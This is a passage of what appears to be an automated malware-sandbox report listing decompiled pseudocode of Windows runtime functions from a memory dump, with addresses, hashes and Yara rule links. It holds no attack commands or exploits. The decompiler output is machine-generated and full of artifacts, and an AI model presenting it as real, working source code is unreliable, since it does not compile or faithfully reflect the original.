				_t17 =  *0x49a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x49a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x49a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E048FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E048FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x49a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x49a84c4; // 0x0
					L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                            0x048e3b89
                                                            0x048e3b96
                                                            0x048e3ba1
                                                            0x048e3bab
                                                            0x048e3bb5
                                                            0x048e3bb9
                                                            0x04926298
                                                            0x048e3bbf
                                                            0x048e3bc2
                                                            0x048e3bc3
                                                            0x048e3bc9
                                                            0x048e3bca
                                                            0x048e3bcc
                                                            0x048e3bcd
                                                            0x048e3bd4
                                                            0x048e3bd6
                                                            0x048e3bdb
                                                            0x048e3bea
                                                            0x048e3bf7
                                                            0x048e3bfb
                                                            0x048e3bff
                                                            0x048e3c09
                                                            0x048e3c0a
                                                            0x048e3c0b
                                                            0x048e3c0f
                                                            0x048e3c14
                                                            0x048e3c18
                                                            0x048e3c18
                                                            0x048e3bfb
                                                            0x048e3c1b
                                                            0x048e3c30
                                                            0x048e3c30
                                                            0x048e3c3d

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06c51456af1b7cc15f57b0a704c3f26234d83c9bfa200372436ae37b12371674
                                                            • Instruction ID: bc53a7ee2d33d600e5bcfcde7043dc88b93c68c6ca9b2f6b5c32d89750c74029
                                                            • Opcode Fuzzy Hash: 06c51456af1b7cc15f57b0a704c3f26234d83c9bfa200372436ae37b12371674
                                                            • Instruction Fuzzy Hash: 8721ACB2A00108AFD700DF58CD81B6ABBBDFB44708F250568EA09EB251D371ED218B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04936CF0, Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E04936CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E048D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E048D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4895c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E048EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E048EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04937016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L048D2400( &_v52);
								}
								_t21 = L048D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                            0x04936cfb
                                                            0x04936d00
                                                            0x04936d02
                                                            0x04936d06
                                                            0x04936d0a
                                                            0x04936d0e
                                                            0x04936d19
                                                            0x04936d2b
                                                            0x04936d1b
                                                            0x04936d24
                                                            0x04936d24
                                                            0x04936d33
                                                            0x04936d39
                                                            0x04936d46
                                                            0x04936d4f
                                                            0x04936d61
                                                            0x04936d51
                                                            0x04936d5a
                                                            0x04936d5a
                                                            0x04936d69
                                                            0x04936d6b
                                                            0x04936d6d
                                                            0x04936d6f
                                                            0x04936d6f
                                                            0x04936d74
                                                            0x04936d79
                                                            0x04936d7a
                                                            0x04936d7f
                                                            0x04936d82
                                                            0x04936d88
                                                            0x04936d89
                                                            0x04936d90
                                                            0x04936d94
                                                            0x04936da7
                                                            0x04936db1
                                                            0x04936db1
                                                            0x04936dbb
                                                            0x04936dbb
                                                            0x04936d90
                                                            0x04936d69
                                                            0x04936d46
                                                            0x04936dc6

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66d3fa6fde6e1434f86383d04220136a34db731104dfb613fbfa1c9b91b2a978
                                                            • Instruction ID: 256d5636d450af05eaf78c4195eb6c781aa01b557e569356da999982eee18bf9
                                                            • Opcode Fuzzy Hash: 66d3fa6fde6e1434f86383d04220136a34db731104dfb613fbfa1c9b91b2a978
                                                            • Instruction Fuzzy Hash: D021F272501244ABD721DF69CD44F6BBBECAF82754F040966F990C7260E734FA08C6A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0498070D, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E0498070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E049807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0497AFDE( &_v8,  &_v12);
					E04981293(_t38, _v28, _t60);
					if(E048D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                            0x0498071b
                                                            0x04980724
                                                            0x04980734
                                                            0x04980738
                                                            0x0498074b
                                                            0x0498074b
                                                            0x04980753
                                                            0x04980753
                                                            0x04980759
                                                            0x0498075d
                                                            0x04980774
                                                            0x04980779
                                                            0x0498077d
                                                            0x04980789
                                                            0x04980795
                                                            0x049807a7
                                                            0x04980797
                                                            0x049807a0
                                                            0x049807a0
                                                            0x049807af
                                                            0x049807c4
                                                            0x049807cd
                                                            0x049807cd
                                                            0x049807af
                                                            0x049807dc

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                            • Instruction ID: 4d183473f38617cc0368dd8779e1ec1059bd3ed8cade0c75b6ce0d78ddad8ddf
                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                            • Instruction Fuzzy Hash: DF21F2362042009FD715EF2CCC80B6ABBA9FBC4350F04867DF9958B385D630E909CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048DAE73, Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E048DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E048D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E048D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E048D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E048D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04937794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                            0x048dae78
                                                            0x048dae7c
                                                            0x048dae7e
                                                            0x048dae81
                                                            0x048dae86
                                                            0x048dae8d
                                                            0x04922691
                                                            0x048dae93
                                                            0x048dae93
                                                            0x048dae93
                                                            0x048dae98
                                                            0x048dae9d
                                                            0x049226a2
                                                            0x049226b4
                                                            0x049226a4
                                                            0x049226ad
                                                            0x049226ad
                                                            0x049226b9
                                                            0x00000000
                                                            0x049226bb
                                                            0x00000000
                                                            0x049226bb
                                                            0x048daea3
                                                            0x048daea3
                                                            0x048daea3
                                                            0x048daeaa
                                                            0x049226c0
                                                            0x049226c9
                                                            0x049226c9
                                                            0x048daeb3
                                                            0x049226d4
                                                            0x049226e1
                                                            0x00000000
                                                            0x00000000
                                                            0x049226e7
                                                            0x049226ee
                                                            0x049226f0
                                                            0x049226f9
                                                            0x049226f9
                                                            0x04922702
                                                            0x04922708
                                                            0x04922708
                                                            0x0492270b
                                                            0x0492270f
                                                            0x04922711
                                                            0x04922711
                                                            0x04922725
                                                            0x04922725
                                                            0x00000000
                                                            0x048daeb9
                                                            0x048daeb9
                                                            0x048daebf
                                                            0x048daebf
                                                            0x048daeb3

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                            • Instruction ID: da78486d21ec8b4b155439656b3857426284fb33045765efbba42492443c83fd
                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                            • Instruction Fuzzy Hash: FE210432A026948FEB159B68CA44B2537E8EF41344F1905F2DC04CB69AE774FD40C691
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04937794, Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E04937794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x49a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E048FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E048D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E048F9AE0();
					_t24 = L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                            0x04937799
                                                            0x0493779a
                                                            0x0493779b
                                                            0x049377a3
                                                            0x049377ab
                                                            0x049377ae
                                                            0x049377b1
                                                            0x049377b1
                                                            0x049377bf
                                                            0x049377c4
                                                            0x049377c8
                                                            0x049377ce
                                                            0x049377d4
                                                            0x049377e0
                                                            0x049377e0
                                                            0x049377d6
                                                            0x049377d6
                                                            0x049377de
                                                            0x00000000
                                                            0x00000000
                                                            0x049377de
                                                            0x049377e5
                                                            0x049377f0
                                                            0x049377f3
                                                            0x049377f6
                                                            0x049377fd
                                                            0x04937800
                                                            0x0493780c
                                                            0x04937818
                                                            0x0493782b
                                                            0x0493781a
                                                            0x04937823
                                                            0x04937823
                                                            0x04937830
                                                            0x04937831
                                                            0x04937838
                                                            0x0493783d
                                                            0x0493783e
                                                            0x0493784f
                                                            0x0493784f
                                                            0x0493785a

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b174bcc3ada967f7699f35cfc639043533f41de493565dc7642fc8c5367b7613
                                                            • Instruction ID: 8ae660cfb85e6f5382b5c189ef9ba02545855ec399a7db41e839bbaa38b39485
                                                            • Opcode Fuzzy Hash: b174bcc3ada967f7699f35cfc639043533f41de493565dc7642fc8c5367b7613
                                                            • Instruction Fuzzy Hash: 20219FB2901604ABD725DFA9DC80E6BB7ADEF49740F104669E60AC7750D634E900CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EFD9B, Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E048EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E048C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L048D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                            0x048efd9b
                                                            0x048efda0
                                                            0x048efda1
                                                            0x048efdab
                                                            0x048efdad
                                                            0x048efdb0
                                                            0x048efdb8
                                                            0x048efe0f
                                                            0x048efde6
                                                            0x048efde9
                                                            0x048efdec
                                                            0x0492c0c0
                                                            0x048efdfe
                                                            0x048efe06
                                                            0x048efe06
                                                            0x0492c0c8
                                                            0x048efe2d
                                                            0x048efe2d
                                                            0x00000000
                                                            0x048efe2d
                                                            0x0492c0d1
                                                            0x0492c0e0
                                                            0x0492c0e5
                                                            0x0492c0e5
                                                            0x0492c0e8
                                                            0x00000000
                                                            0x0492c0e8
                                                            0x048efdf4
                                                            0x00000000
                                                            0x00000000
                                                            0x048efdf6
                                                            0x048efdfa
                                                            0x048efe1a
                                                            0x048efe1f
                                                            0x048efe1f
                                                            0x048efdfc
                                                            0x00000000
                                                            0x048efdfc
                                                            0x048efdcc
                                                            0x048efdd0
                                                            0x048efe26
                                                            0x00000000
                                                            0x048efe26
                                                            0x048efdd8
                                                            0x048efddb
                                                            0x048efddd
                                                            0x048efde0
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                            • Instruction ID: 853427d811bd268240fb9774965ea3759ae0995d7121205216fde37c472361f2
                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                            • Instruction Fuzzy Hash: 04215C72A44645EBD7318F0AC540A66B7E9EB95B14F248A6EEA45CB610E730FC00DB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048B9240, Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E048B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x498f708);
				E0490D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E048F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E048F95D0();
				_t33 =  *0x49a84c4; // 0x0
				L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x49a84c4; // 0x0
				L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x49a84c4; // 0x0
				E048D2280(L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x49a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E048F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E048F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E048B9325();
					_t50 =  *0x49a84c4; // 0x0
					return E0490D0D1(L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                            0x048b9240
                                                            0x048b9242
                                                            0x048b9247
                                                            0x048b924c
                                                            0x048b924e
                                                            0x048b9255
                                                            0x048b9257
                                                            0x048b925a
                                                            0x048b925f
                                                            0x048b925f
                                                            0x048b9266
                                                            0x048b9271
                                                            0x048b9276
                                                            0x048b9279
                                                            0x048b927e
                                                            0x048b9295
                                                            0x048b929a
                                                            0x048b92b1
                                                            0x048b92b6
                                                            0x048b92d7
                                                            0x048b92dc
                                                            0x048b92e0
                                                            0x048b92e6
                                                            0x048b92e8
                                                            0x048b92ee
                                                            0x048b9332
                                                            0x048b9333
                                                            0x048b9337
                                                            0x048b9338
                                                            0x048b933a
                                                            0x048b933a
                                                            0x048b933d
                                                            0x048b9342
                                                            0x048b9342
                                                            0x048b9345
                                                            0x048b9349
                                                            0x048b934e
                                                            0x048b9352
                                                            0x048b9357
                                                            0x048b92f4
                                                            0x048b92f4
                                                            0x048b92f6
                                                            0x048b92f9
                                                            0x048b9300
                                                            0x048b9306
                                                            0x048b9324
                                                            0x048b9324

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5decba7d1f226748cb566426e330dfd2e0f9e876809268219e46f14ac8f862f5
                                                            • Instruction ID: f6ca1455e8d137b60af3e290d907140a49c6949b3b11ad2192dc04d31fc170c5
                                                            • Opcode Fuzzy Hash: 5decba7d1f226748cb566426e330dfd2e0f9e876809268219e46f14ac8f862f5
                                                            • Instruction Fuzzy Hash: 4C2114B2481A00DFD721EF6CCA44B5ABBF9FF08708F144A68E149C66A1CB74F951CB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048EB390, Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 54%
                                                            			E048EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E048D2280(_t12, 0x49a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E048F00C2(0x49a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L048D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                            0x048eb395
                                                            0x048eb3a2
                                                            0x048eb3a5
                                                            0x048eb3aa
                                                            0x048eb3b2
                                                            0x048eb3ba
                                                            0x048eb3bd
                                                            0x048eb3c0
                                                            0x048eb3c4
                                                            0x048eb3c9
                                                            0x0492a3e9
                                                            0x0492a3ed
                                                            0x0492a3f0
                                                            0x0492a3ff
                                                            0x0492a403
                                                            0x0492a409
                                                            0x00000000
                                                            0x00000000
                                                            0x0492a40b
                                                            0x0492a40b
                                                            0x0492a40f
                                                            0x0492a415
                                                            0x0492a423
                                                            0x0492a423
                                                            0x0492a415
                                                            0x048eb3d1
                                                            0x048eb3e8
                                                            0x048eb3e8
                                                            0x048eb3d9

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70d9077a9b53075aec4232abb9fbb98427ee0d5d7988aea83700534f6352b2c7
                                                            • Instruction ID: 58a53a2f25848e9bb341afb60d7182629b2919ee16daac24e5841fce6d423b08
                                                            • Opcode Fuzzy Hash: 70d9077a9b53075aec4232abb9fbb98427ee0d5d7988aea83700534f6352b2c7
                                                            • Instruction Fuzzy Hash: 66114C377111105BDB18DE19DE4163BB3A6EBC6334B284A39DD16D7780D931BC11C6D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04944257, Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E04944257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x49908d0);
				E0490D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E049441E8(__ebx, __edi, __ecx, _t39);
				E048CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x49a87e4;
					_t18 =  *0x49a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x49a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x49a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x49a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L048B7055(_t31 + 0xfffffff8);
